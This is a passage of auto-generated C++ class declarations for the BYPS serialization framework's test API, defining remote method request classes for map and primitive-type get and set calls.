using namespace ::byps;
class BRequest_RemoteMapTypes_getObj1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getObj1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getPrimitiveTypes1
// typeId=1745799327
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getPrimitiveTypes1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getPrimitiveTypes1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getShort1
// typeId=899426613
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getShort1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getShort1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_getString1
// typeId=1836497856
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_getString1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_getString1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setBoolean1
// typeId=974383083
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setBoolean1 : public BMethodRequest {
public: byps::PMapStringBoolean boolean1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setBoolean1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setBoolean1(const byps::PMapStringBoolean& boolean1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setByte1
// typeId=685835107
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setByte1 : public BMethodRequest {
public: byps::PMapDoubleByte byte1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setByte1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setByte1(const byps::PMapDoubleByte& byte1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setByte2
// typeId=685835106
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setByte2 : public BMethodRequest {
public: byps_ptr< ::std::map< int32_t , PBytes > > byte2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setByte2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setByte2(const byps_ptr< ::std::map< int32_t , PBytes > >& byte2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setChar1
// typeId=685435889
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setChar1 : public BMethodRequest {
public: byps::PMapFloatCharacter char1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setChar1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setChar1(const byps::PMapFloatCharacter& char1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setDate1
// typeId=684703049
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setDate1 : public BMethodRequest {
public: byps::PMapStringDate obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setDate1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setDate1(const byps::PMapStringDate& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setDouble1
// typeId=467931660
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setDouble1 : public BMethodRequest {
public: byps::PMapByteDouble double1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setDouble1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setDouble1(const byps::PMapByteDouble& double1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setFloat1
// typeId=316308321
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setFloat1 : public BMethodRequest {
public: byps::PMapCharacterFloat float1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setFloat1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setFloat1(const byps::PMapCharacterFloat& float1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setInt1
// typeId=1407399122
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setInt1 : public BMethodRequest {
public: byps::PMapIntegerInteger int1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setInt1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setInt1(const byps::PMapIntegerInteger& int1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setInt2
// typeId=1407399121
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setInt2 : public BMethodRequest {
public: byps_ptr< ::std::map< int32_t , PArrayInt > > int2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setInt2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setInt2(const byps_ptr< ::std::map< int32_t , PArrayInt > >& int2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setLong1
// typeId=676903511
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setLong1 : public BMethodRequest {
public: byps::PMapShortLong long1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setLong1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setLong1(const byps::PMapShortLong& long1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setObj1
// typeId=1407232218
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setObj1 : public BMethodRequest {
public: byps::PMapStringObject obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setObj1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setObj1(const byps::PMapStringObject& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setPrimitiveTypes1
// typeId=1629134317
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setPrimitiveTypes1 : public BMethodRequest {
public: byps::test::api::prim::PMapIntegerPrimitiveTypes primitiveTypes1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setPrimitiveTypes1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setPrimitiveTypes1(const byps::test::api::prim::PMapIntegerPrimitiveTypes& primitiveTypes1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setShort1
// typeId=684809537
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setShort1 : public BMethodRequest {
public: byps::PMapLongShort short1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setShort1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setShort1(const byps::PMapLongShort& short1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteMapTypes_setString1
// typeId=100307380
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteMapTypes_setString1 : public BMethodRequest {
public: byps::PMapStringString string1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteMapTypes_setString1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteMapTypes_setString1(const byps::PMapStringString& string1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_add
// typeId=362528512
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_add : public BMethodRequest {
public: int32_t a;
public: int32_t b;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_add();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_add(int32_t a, int32_t b);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getBool
// typeId=1816157633
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getBool : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getBool();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getByte
// typeId=1816147875
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getByte : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getByte();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getChar
// typeId=1816134997
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getChar : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getChar();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getDate
// typeId=1816111357
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getDate : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getDate();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getDeferredValueFromServer
// typeId=547282058
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getDeferredValueFromServer : public BMethodRequest {
public: int32_t param1;
public: ::std::wstring param2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getDeferredValueFromServer();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_getDeferredValueFromServer(int32_t param1, const ::std::wstring& param2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getDouble
// typeId=1513332250
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getDouble : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getDouble();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getFloat
// typeId=462707289
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getFloat : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getFloat();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getInt
// typeId=1582599686
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getInt : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getInt();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getLong
// typeId=1815859759
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getLong : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getLong();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getObject
// typeId=1210742444
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getObject : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getObject();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getPrimitiveTypes
// typeId=714626279
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getPrimitiveTypes : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getPrimitiveTypes();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getShort
// typeId=450820153
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getShort : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getShort();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_getString
// typeId=1079359962
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_getString : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_getString();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_makeDate
// typeId=1918934973
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_makeDate : public BMethodRequest {
public: int32_t year = 1;
public: int32_t month;
public: int32_t day;
public: int32_t hour;
public: int32_t minute;
public: int32_t second;
public: int32_t millisecond;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_makeDate();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_makeDate(int32_t year, int32_t month, int32_t day, int32_t hour, int32_t minute, int32_t second, int32_t millisecond);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_parseDate
// typeId=578007072
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_parseDate : public BMethodRequest {
public: BDateTime date;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_parseDate();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_parseDate(const BDateTime& date);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_sendAllTypes
// typeId=677876863
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_sendAllTypes : public BMethodRequest {
public: bool b;
public: wchar_t c;
public: int16_t s;
public: int32_t i;
public: int64_t l;
public: float f;
public: double d;
public: ::std::wstring str;
public: byps::test::api::prim::PPrimitiveTypes pt;
public: PSerializable o;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_sendAllTypes();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_sendAllTypes(bool b, wchar_t c, int16_t s, int32_t i, int64_t l, float f, double d, const ::std::wstring& str, const byps::test::api::prim::PPrimitiveTypes& pt, const PSerializable& o);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setBool
// typeId=243951947
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setBool : public BMethodRequest {
public: bool v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setBool();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setBool(bool v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setByte
// typeId=243961705
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setByte : public BMethodRequest {
public: int8_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setByte();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setByte(int8_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setChar
// typeId=243974583
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setChar : public BMethodRequest {
public: wchar_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setChar();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setChar(wchar_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setDate
// typeId=243998223
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setDate : public BMethodRequest {
public: BDateTime v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setDate();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setDate(const BDateTime& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setDouble
// typeId=1727949326
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setDouble : public BMethodRequest {
public: double v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setDouble();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setDouble(double v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setFloat
// typeId=1023819749
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setFloat : public BMethodRequest {
public: float v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setFloat();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setFloat(float v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setInt
// typeId=1239049874
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setInt : public BMethodRequest {
public: int32_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setInt(int32_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
